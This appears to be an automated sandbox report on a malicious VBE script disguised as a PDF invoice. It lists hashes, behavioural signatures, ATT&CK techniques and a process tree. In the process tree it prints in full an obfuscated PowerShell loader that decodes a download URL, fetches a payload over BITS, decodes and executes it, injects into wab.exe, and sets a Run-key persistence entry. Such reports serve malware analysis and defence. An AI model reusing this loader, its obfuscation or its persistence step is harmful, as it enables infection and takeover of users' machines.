364702ebab29d8422e3612ab66ff2732d1a45153a6a969a6d09b0b341d1a6366

General

Target

Faktura_21110498774987·pdf.vbe
Size

251KB
MD5

c2d91d1d271983f5d3ddcc6229d572f1
SHA1

42214503d23d5f889b2ca926b9b56971fe593fc2
SHA256

18b75005950d9e39a1eb5ce18453e23e00ddecb2ac941967686f8a27b2db9ef9
SHA512

9ba3fbd35d1d2d01815be68858d3225968bc4265f15a9fcf8430fbff38c9e024feb5dc0088fcedc7be831947f98018c4ff0e9035e1aabc64bb68abccaac8c6be
SSDEEP

6144:jbMIJnEsivnLMFiPP1Yq4zCfB+GS7OjwM3aECUXmk:fMRngIP154+3wM3ruk

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows\CurrentVersion\Run\Safa = "%Poka4% -w 1 $Folke=(Get-ItemProperty -Path 'HKCU:\\Trutin\\').Apocryp;%Poka4% ($Folke)"	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2860	powershell.exe
2596	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2860 set thread context of 2596	2860	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2780	powershell.exe
2860	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2860	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2780	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 1736 wrote to memory of 2780	1736	WScript.exe	29
PID 1736 wrote to memory of 2780	1736	WScript.exe	29
PID 1736 wrote to memory of 2780	1736	WScript.exe	29
PID 2780 wrote to memory of 2860	2780	powershell.exe	31
PID 2780 wrote to memory of 2860	2780	powershell.exe	31
PID 2780 wrote to memory of 2860	2780	powershell.exe	31
PID 2780 wrote to memory of 2860	2780	powershell.exe	31
PID 2860 wrote to memory of 2596	2860	powershell.exe	34
PID 2860 wrote to memory of 2596	2860	powershell.exe	34
PID 2860 wrote to memory of 2596	2860	powershell.exe	34
PID 2860 wrote to memory of 2596	2860	powershell.exe	34
PID 2860 wrote to memory of 2596	2860	powershell.exe	34
PID 2860 wrote to memory of 2596	2860	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_21110498774987·pdf.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Sout ([String]$Stumbler){$Nonmeatf = 8;$Yonicemb = ($Stumbler | Measure-Object -Character).Characters;For ($Hitteba=7; $Hitteba -lt $Yonicemb-1; $Hitteba+=$Nonmeatf){$udmrkels=$udmrkels+$Stumbler.Substring($Hitteba, 1)};$udmrkels;}$Noetianin=Sout ' Udstrah Ufoaibt PicrabtPrebetrpLexicols Aladfa:Loadabl/Talisma/BuzzlehdIndlsnir OldemoiReinspivBaroniceToiletp.CruddyggfilmfotoLoitereo HammadgkrkommelOprakteeSeminar.detaildcIntrunkoAlluredmCrushin/ DrestpuFagkritc yndigs? AllopheEndebalxNovembepfugleskoIndvindrepimerotVacuits=Desinfod HurlemoStavrovwEsplananImprovilFestskroformygraVarmblodportall&SprogfoiPatientdisolere=udskill1FlashbaLuhjlpsoV Probit0Bacille4Unpendi8EncarnaPFodbaldzFejlbehXIsolatimPremixt-Funesth3Dommerkx LovregSSideslif DebutasSurerfeHDynamosk VoldtgmTilbind3 FingerUJoggingWafmarchmContredoJonbytnD BergelxResowinV Autogr- Narcom3NearsigIAfkorten Ekstrag tantarHresidue ';$udmrkels01=Sout 'fldechoi Landvse ShagraxPerosom ';$Censo= $udmrkels01;$Noncoordi215 = Sout 'Rehumil\DknetatsSpeedboyGrandpasAdminiswUdbringoSgeordewMoatleg6 Cinder4Triplar\ FinansWSpringfi AudiotnSuppresdKorrekto KontrowRombernsMateshiPMonitoro trickswtabtypeeSiliconrPistoliSTagensvhDiminueeLithogrlInstruelRejicer\Monohybv Udlaan1Omnorme.Abefolk0 Hakkeo\WedderaphovedreoUdseteswTraditieDownshirFrizzessHypoconhFllesklepostinolClaricelLensing.AntagoneIndowedxMeadowyeMercech ';& ($udmrkels01) (Sout 'Antifas$ FandanISapphirnLssalgetGrillkur YarbdiistockisnStrithasBrnebidi UnsecucKnaphul1Labiode9Shiitic2Etherea= Polyga$Unlistse KlapsdnswardedvUroligh:CronhamwChicletiStrmpebnProflogdSporogoiMusefldrDugouta ') ;& ($udmrkels01) (Sout 'Tilsvin$GavflabNPictskio IndrulnBrtsejlcJordfstoHvidbogoFestrelrStemmefd ModpariKomafor2Myograp1Slemmes5 Inkuba=Vandkan$ GeneraI Spilton AssuratDogfishrTermogriNonresonAutoxidsRevnendiGnotobic Dresse1Mineral9Underbi2Kundgjo+Turedea$EdderfuNMyriadeoKlimaernTeleslycPardalho ForlysoFjordrerskolelgdKommunii Resfor2Subtorr1 Scribb5Carligs ') ;. ($udmrkels01) (Sout 'Postrac$SendsoloReisolavErnoutkepaagaaer ReclassBountifeDisadvacUnmanipuHulkenerUnmimete Soloen sprigge=Rteblom Carburi(Signifi(AmericogGonzocrwOversupm ClaybaiGlosehf ildsluwKanonfoi Cadencn Langra3Pelargi2Turnbac_ImputabpMultimarOpfindeoSemideicThermole PerfersBravestsUdtydni Arkaise-TappethFStrudsp HyponeuPRestaterLouteruoSiumspacNdbremseMoanfulsBaandtlsHolytidISeerenbdShippin=Anatopi$Telyndi{SkrivehP PuerpeINaaedecDfalsnin}Tauroco)Noncons. UtrnedC UlcersoDollarfmFreeingm Leukota Spinogn UdlndidInfernaLRagweediRetrofinSubjecteSiliciu)Ingrate Sanktha-RearressDitrochpMonstrolKnipliniLatterat Radioc Cylinde[UnmouthcBukketohGennemsa Intermrstipate]Nebular3Forgaar4anaktor ');. ($udmrkels01) (Sout 'budskab$ SpildtdCatersqiUsdeligrTrapmakeDusinmekSnowlant PaletkiKommuniounelabonSituatisDiploma Adloed=Interes Sheepho$FlovseroFrknensvAccelereringridrIdleshisBlottedegadidaec KarikauPyromucrAgerkaaeSkaftev[Fiskere$Nonenvio Landstv SyllabeAdminisrSmandsssLatviaseUncolorcKippeanuAnglomarMiscropeGstefor.IslttencTrakkasoFossuleu Paradon DagsortRestric-Veduisn2Bungalo]Liegefu ');& ($udmrkels01) (Sout 'Midtpun$StraffeN SemirioShooncen SaurorsFortrincAgglomeiTarerereChiffonnForsvartholethnioverpol= Crafte(keelhauTKommandeKursusssEnighedtForfgte-SmaatinPSprogrgaParafertKoldblohGoffere Overspr$LdervinNSvarteuoSlofbifnLeggeracTrfningoSlvfolioNoncontrDefaitidAnmodeniAmtsraa2Pretann1Soldend5Smaabor)Advices Forward-BondedaAAbbedien MentaldBelaces Lightha(Fyrreaa[ArniroiIOverlapnBartisatHyperpuPCirkustt Prelitr Parabo]swordma: Rapall:MonastisKonvertiDroemmezSeemersebilkonc Fordriv-SkatteieParalyzq Tannab Telope8 Lexicd)Mentali ') ;if ($Nonscienti) {. $Noncoordi215 $direktions;} else {;$udmrkels00=Sout 'LegitimSUncompotForbedraSpecialrNationatSoejlen-BlgmrkeB AbricoiluskeretSamplers ProjekTMacroserSkaldyraSikkerhnSpisesksUdskninfCatastaeGirasolrKosakke Underde- StifttSBlaefanoMargenkuChaoriarLuiginicJuttieseOvercam Figurat$BespakeNBarlockoBrickreeNonburdtLidsraaiaholtbeaAtomicinOnanistiDecongenYngelso Lberety-systempDUdenlanePolypfrsNetvrkst ItelmeiFrtidspnVandrepaStigendtPhotociiHomocreoTeleteknfinansl Uheldsv$UnliquiI CurtsenSphagnotLugtgenrSygekasiForligsnParanoisDaskeneiKomponic Unerro1Skamsla9Reinteg2Aftestn ';& ($udmrkels01) (Sout 'Galacto$BromatoIUdjvninnDemyelitNeedlecrGenonemiLinsdisnBarmmacsCroighlislipefocBrombrb1Hjhuset9Maalere2Pomfres=Sammens$ satsmeeStoplygn HomopovDeponer:DeltageaAlacriopTrioecipSarracedKlubhola ElissatSygepleaHorsewh ') ;. ($udmrkels01) (Sout 'PreconiICurdlinmUndiminpkaareskoArbejdsrUnpatrot Surger-PredefrMUdflyttoThruvild Cataphuentraill ExpofoeFoenicu ApadanB BantueiRutebilt MdedagsstabelvTSkitsebrLuxivehaRereadsnSternitsCeleborfHbscopoeHvidtlprSofacyk ') ;$Intrinsic192=$Intrinsic192+'\Fennosk.Ami';while (-not $Victa) {. ($udmrkels01) (Sout 'Recchek$PrerecoV NskeliiExcoverc Speciat ulceroaPaddleb= Gloios(RobotisTMinersde Banglas BellistHarpern-SomewhePBrandchaEpikiakt Importh Forbld Regnsko$ SammenITroloven paracetTelefotrMaanedsiAppendenForstensDeadpaniUkristec Parado1Unarmou9Catawam2Locowee)Chanker ') ;& ($udmrkels01) $udmrkels00;. ($udmrkels01) (Sout 'SardoesSUsenetltGennemtaTillgsbrSuccesstDyppels-LkkerbiSIntersulMalemaaeAfkrydseSardiaspGaumsbi Montemt5Polyden ');}. ($udmrkels01) (Sout 'Tragtni$underskTovardspeKlemskrrProduktm UdnyttoKombinasUninhibtSweetenaeuxanthtKurvetrvOrdbill Kowtowe=Nedarve GlobaliGDramaereLuminartBerusep-ConcresCGunthero MentalnGevirertHarrepaerelativnDgnvagttLytteap Nonelec$AftllinIAnagnosnReinstitAubergerUrgoniaiGesandtn AnimatsVelsespiFuglemac Differ1 Sclero9Supernu2 Perich ');& ($udmrkels01) (Sout 'Seismog$EohippuL byportoTanogenvMailieseGuldnldmElaters Siddevo=Prerest Indhold[FodfsteSVacantryInformesUnatonitkivinaneProgrammAloinst.SolcellCOuthowloHaandtrnMansteavShearleeIsolatir SutteftVrtshus]Loosemo:Umisken:BenzoylF Apopler DeuteroOutstepmHarmoniBemprizeaCancernsWainlaueEkspedi6Selvher4InjurieSWatterltFiltetsrInteraci KomprinAfstigngAntioxi( Bevoks$ SdmefuTGoatskieAxillarrHemocoemdriftssoTyphonisUndermatNvnesvea FrekvetBrestolvGalning)Tilsnee ');&($udmrkels01) (Sout 'Paapegn$UnrefunuValedicdCabrettm ViscourSomiklekAutoreneOmdannel BotanisTalmasc2 Hmorid Phaseol= fjerne Stennas[UtaetheS Racedey AkvamasStopgaptIncrueneUddannem impert. TartraT AnimaleFdebysexSedgedttLutesni.InvestlEEkskommnPredeplcTetrakioSelvopfdAlmenejiAprendinWoodwarg Fortyk]Conflat:Additio:ThingumABehovsdSTerminaCRepletiITautonyISufflat.TreacheG Serenae GlucurtErfarinSSrboerntMachicorCafecykiTaarnugnSvrvgtegSatrapy(Taktful$AfkasteL informoUdsprngv PulluleHaggeismfrstega)Bacchic ');& ($udmrkels01) (Sout 'Schepel$FormaguRShakenleudbudetaDiversitEmbedsf=Popishe$UnattenuBrddeskdRattlermImprisor DagsvrkDithemaevertebrl NonmansScroung2Unadjud.DrabblesSeiyukauHypopusbSlotenesDiskredtAntalokrAdresseiVekslcon Undivigcatingt(Whslema Himmeri Detruge2 Fiumar8balanop3Kystvan3Tirress9Dispone8 Kinest, Pinnat2Bedemll0Photogr1Basnses8Forcipe8Kittiwa)Taageho ');& ($udmrkels01) $Reat;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "function Sout ([String]$Stumbler){$Nonmeatf = 8;$Yonicemb = ($Stumbler | Measure-Object -Character).Characters;For ($Hitteba=7; $Hitteba -lt $Yonicemb-1; $Hitteba+=$Nonmeatf){$udmrkels=$udmrkels+$Stumbler.Substring($Hitteba, 1)};$udmrkels;}$Noetianin=Sout ' Udstrah Ufoaibt PicrabtPrebetrpLexicols Aladfa:Loadabl/Talisma/BuzzlehdIndlsnir OldemoiReinspivBaroniceToiletp.CruddyggfilmfotoLoitereo HammadgkrkommelOprakteeSeminar.detaildcIntrunkoAlluredmCrushin/ DrestpuFagkritc yndigs? AllopheEndebalxNovembepfugleskoIndvindrepimerotVacuits=Desinfod HurlemoStavrovwEsplananImprovilFestskroformygraVarmblodportall&SprogfoiPatientdisolere=udskill1FlashbaLuhjlpsoV Probit0Bacille4Unpendi8EncarnaPFodbaldzFejlbehXIsolatimPremixt-Funesth3Dommerkx LovregSSideslif DebutasSurerfeHDynamosk VoldtgmTilbind3 FingerUJoggingWafmarchmContredoJonbytnD BergelxResowinV Autogr- Narcom3NearsigIAfkorten Ekstrag tantarHresidue ';$udmrkels01=Sout 'fldechoi Landvse ShagraxPerosom ';$Censo= $udmrkels01;$Noncoordi215 = Sout 'Rehumil\DknetatsSpeedboyGrandpasAdminiswUdbringoSgeordewMoatleg6 Cinder4Triplar\ FinansWSpringfi AudiotnSuppresdKorrekto KontrowRombernsMateshiPMonitoro trickswtabtypeeSiliconrPistoliSTagensvhDiminueeLithogrlInstruelRejicer\Monohybv Udlaan1Omnorme.Abefolk0 Hakkeo\WedderaphovedreoUdseteswTraditieDownshirFrizzessHypoconhFllesklepostinolClaricelLensing.AntagoneIndowedxMeadowyeMercech ';& ($udmrkels01) (Sout 'Antifas$ FandanISapphirnLssalgetGrillkur YarbdiistockisnStrithasBrnebidi UnsecucKnaphul1Labiode9Shiitic2Etherea= Polyga$Unlistse KlapsdnswardedvUroligh:CronhamwChicletiStrmpebnProflogdSporogoiMusefldrDugouta ') ;& ($udmrkels01) (Sout 'Tilsvin$GavflabNPictskio IndrulnBrtsejlcJordfstoHvidbogoFestrelrStemmefd ModpariKomafor2Myograp1Slemmes5 Inkuba=Vandkan$ GeneraI Spilton AssuratDogfishrTermogriNonresonAutoxidsRevnendiGnotobic Dresse1Mineral9Underbi2Kundgjo+Turedea$EdderfuNMyriadeoKlimaernTeleslycPardalho ForlysoFjordrerskolelgdKommunii Resfor2Subtorr1 Scribb5Carligs ') ;. ($udmrkels01) (Sout 'Postrac$SendsoloReisolavErnoutkepaagaaer ReclassBountifeDisadvacUnmanipuHulkenerUnmimete Soloen sprigge=Rteblom Carburi(Signifi(AmericogGonzocrwOversupm ClaybaiGlosehf ildsluwKanonfoi Cadencn Langra3Pelargi2Turnbac_ImputabpMultimarOpfindeoSemideicThermole PerfersBravestsUdtydni Arkaise-TappethFStrudsp HyponeuPRestaterLouteruoSiumspacNdbremseMoanfulsBaandtlsHolytidISeerenbdShippin=Anatopi$Telyndi{SkrivehP PuerpeINaaedecDfalsnin}Tauroco)Noncons. UtrnedC UlcersoDollarfmFreeingm Leukota Spinogn UdlndidInfernaLRagweediRetrofinSubjecteSiliciu)Ingrate Sanktha-RearressDitrochpMonstrolKnipliniLatterat Radioc Cylinde[UnmouthcBukketohGennemsa Intermrstipate]Nebular3Forgaar4anaktor ');. ($udmrkels01) (Sout 'budskab$ SpildtdCatersqiUsdeligrTrapmakeDusinmekSnowlant PaletkiKommuniounelabonSituatisDiploma Adloed=Interes Sheepho$FlovseroFrknensvAccelereringridrIdleshisBlottedegadidaec KarikauPyromucrAgerkaaeSkaftev[Fiskere$Nonenvio Landstv SyllabeAdminisrSmandsssLatviaseUncolorcKippeanuAnglomarMiscropeGstefor.IslttencTrakkasoFossuleu Paradon DagsortRestric-Veduisn2Bungalo]Liegefu ');& ($udmrkels01) (Sout 'Midtpun$StraffeN SemirioShooncen SaurorsFortrincAgglomeiTarerereChiffonnForsvartholethnioverpol= Crafte(keelhauTKommandeKursusssEnighedtForfgte-SmaatinPSprogrgaParafertKoldblohGoffere Overspr$LdervinNSvarteuoSlofbifnLeggeracTrfningoSlvfolioNoncontrDefaitidAnmodeniAmtsraa2Pretann1Soldend5Smaabor)Advices Forward-BondedaAAbbedien MentaldBelaces Lightha(Fyrreaa[ArniroiIOverlapnBartisatHyperpuPCirkustt Prelitr Parabo]swordma: Rapall:MonastisKonvertiDroemmezSeemersebilkonc Fordriv-SkatteieParalyzq Tannab Telope8 Lexicd)Mentali ') ;if ($Nonscienti) {. $Noncoordi215 $direktions;} else {;$udmrkels00=Sout 'LegitimSUncompotForbedraSpecialrNationatSoejlen-BlgmrkeB AbricoiluskeretSamplers ProjekTMacroserSkaldyraSikkerhnSpisesksUdskninfCatastaeGirasolrKosakke Underde- StifttSBlaefanoMargenkuChaoriarLuiginicJuttieseOvercam Figurat$BespakeNBarlockoBrickreeNonburdtLidsraaiaholtbeaAtomicinOnanistiDecongenYngelso Lberety-systempDUdenlanePolypfrsNetvrkst ItelmeiFrtidspnVandrepaStigendtPhotociiHomocreoTeleteknfinansl Uheldsv$UnliquiI CurtsenSphagnotLugtgenrSygekasiForligsnParanoisDaskeneiKomponic Unerro1Skamsla9Reinteg2Aftestn ';& ($udmrkels01) (Sout 'Galacto$BromatoIUdjvninnDemyelitNeedlecrGenonemiLinsdisnBarmmacsCroighlislipefocBrombrb1Hjhuset9Maalere2Pomfres=Sammens$ satsmeeStoplygn HomopovDeponer:DeltageaAlacriopTrioecipSarracedKlubhola ElissatSygepleaHorsewh ') ;. ($udmrkels01) (Sout 'PreconiICurdlinmUndiminpkaareskoArbejdsrUnpatrot Surger-PredefrMUdflyttoThruvild Cataphuentraill ExpofoeFoenicu ApadanB BantueiRutebilt MdedagsstabelvTSkitsebrLuxivehaRereadsnSternitsCeleborfHbscopoeHvidtlprSofacyk ') ;$Intrinsic192=$Intrinsic192+'\Fennosk.Ami';while (-not $Victa) {. ($udmrkels01) (Sout 'Recchek$PrerecoV NskeliiExcoverc Speciat ulceroaPaddleb= Gloios(RobotisTMinersde Banglas BellistHarpern-SomewhePBrandchaEpikiakt Importh Forbld Regnsko$ SammenITroloven paracetTelefotrMaanedsiAppendenForstensDeadpaniUkristec Parado1Unarmou9Catawam2Locowee)Chanker ') ;& ($udmrkels01) $udmrkels00;. ($udmrkels01) (Sout 'SardoesSUsenetltGennemtaTillgsbrSuccesstDyppels-LkkerbiSIntersulMalemaaeAfkrydseSardiaspGaumsbi Montemt5Polyden ');}. ($udmrkels01) (Sout 'Tragtni$underskTovardspeKlemskrrProduktm UdnyttoKombinasUninhibtSweetenaeuxanthtKurvetrvOrdbill Kowtowe=Nedarve GlobaliGDramaereLuminartBerusep-ConcresCGunthero MentalnGevirertHarrepaerelativnDgnvagttLytteap Nonelec$AftllinIAnagnosnReinstitAubergerUrgoniaiGesandtn AnimatsVelsespiFuglemac Differ1 Sclero9Supernu2 Perich ');& ($udmrkels01) (Sout 'Seismog$EohippuL byportoTanogenvMailieseGuldnldmElaters Siddevo=Prerest Indhold[FodfsteSVacantryInformesUnatonitkivinaneProgrammAloinst.SolcellCOuthowloHaandtrnMansteavShearleeIsolatir SutteftVrtshus]Loosemo:Umisken:BenzoylF Apopler DeuteroOutstepmHarmoniBemprizeaCancernsWainlaueEkspedi6Selvher4InjurieSWatterltFiltetsrInteraci KomprinAfstigngAntioxi( Bevoks$ SdmefuTGoatskieAxillarrHemocoemdriftssoTyphonisUndermatNvnesvea FrekvetBrestolvGalning)Tilsnee ');&($udmrkels01) (Sout 'Paapegn$UnrefunuValedicdCabrettm ViscourSomiklekAutoreneOmdannel BotanisTalmasc2 Hmorid Phaseol= fjerne Stennas[UtaetheS Racedey AkvamasStopgaptIncrueneUddannem impert. TartraT AnimaleFdebysexSedgedttLutesni.InvestlEEkskommnPredeplcTetrakioSelvopfdAlmenejiAprendinWoodwarg Fortyk]Conflat:Additio:ThingumABehovsdSTerminaCRepletiITautonyISufflat.TreacheG Serenae GlucurtErfarinSSrboerntMachicorCafecykiTaarnugnSvrvgtegSatrapy(Taktful$AfkasteL informoUdsprngv PulluleHaggeismfrstega)Bacchic ');& ($udmrkels01) (Sout 'Schepel$FormaguRShakenleudbudetaDiversitEmbedsf=Popishe$UnattenuBrddeskdRattlermImprisor DagsvrkDithemaevertebrl NonmansScroung2Unadjud.DrabblesSeiyukauHypopusbSlotenesDiskredtAntalokrAdresseiVekslcon Undivigcatingt(Whslema Himmeri Detruge2 Fiumar8balanop3Kystvan3Tirress9Dispone8 Kinest, Pinnat2Bedemll0Photogr1Basnses8Forcipe8Kittiwa)Taageho ');& ($udmrkels01) $Reat;}"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
23d597f22fa2af2916ece31ed9065bb1

SHA1
2a9245e6487482e32fb945d1bdbdda5fd8640030

SHA256
a93ea533e8df54ccad49f7350ccf7509eb2e3c8935fb7405fec41530ed5ba033

SHA512
d6e17e97cab29a60edccfc29c16c7efa0dc52f23cf2f0b06030f793757ee62835bcc316dc6f119672ec404e9b74fdcca150ddccd0a3d221bc145c60c660c8a89

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8B01.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5CYDJVSJSTG9JH5EMT5Q.temp

Filesize
7KB

MD5
26532b6956826744aebaaa092704a9ee

SHA1
782697115e60515ecd81ed4ae4c65cea3e8d4959

SHA256
6cf638273778ead1b4959fce67176835fa5d824448852044f2a7c69475ba60fc

SHA512
2b94db8d3110700cf30a2008c7378a577900fc78dceada92d5a95df69984c01f6b97430b4a285fb2b40d2a8222407f9a9b1573436948517577e49115fd4efca2

Download Submit
memory/2596-62-0x000000006F610000-0x0000000070672000-memory.dmp

Filesize
16.4MB

Download
memory/2596-41-0x0000000077300000-0x00000000774A9000-memory.dmp

Filesize
1.7MB

Download
memory/2780-5-0x000000001B230000-0x000000001B512000-memory.dmp

Filesize
2.9MB

Download
memory/2780-10-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-9-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-8-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2780-70-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2780-6-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-7-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2780-26-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2780-27-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-28-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-29-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-30-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2780-4-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp

Filesize
9.6MB

Download
memory/2860-13-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2860-33-0x0000000002330000-0x0000000002370000-memory.dmp

Filesize
256KB

Download
memory/2860-34-0x0000000002330000-0x0000000002370000-memory.dmp

Filesize
256KB

Download
memory/2860-35-0x0000000005190000-0x0000000005191000-memory.dmp

Filesize
4KB

Download
memory/2860-36-0x0000000006400000-0x0000000009706000-memory.dmp

Filesize
51.0MB

Download
memory/2860-39-0x0000000077300000-0x00000000774A9000-memory.dmp

Filesize
1.7MB

Download
memory/2860-40-0x00000000774F0000-0x00000000775C6000-memory.dmp

Filesize
856KB

Download
memory/2860-32-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2860-31-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2860-16-0x0000000002330000-0x0000000002370000-memory.dmp

Filesize
256KB

Download
memory/2860-15-0x0000000002330000-0x0000000002370000-memory.dmp

Filesize
256KB

Download
memory/2860-68-0x0000000002330000-0x0000000002370000-memory.dmp

Filesize
256KB

Download
memory/2860-69-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download
memory/2860-14-0x0000000073340000-0x00000000738EB000-memory.dmp

Filesize
5.7MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads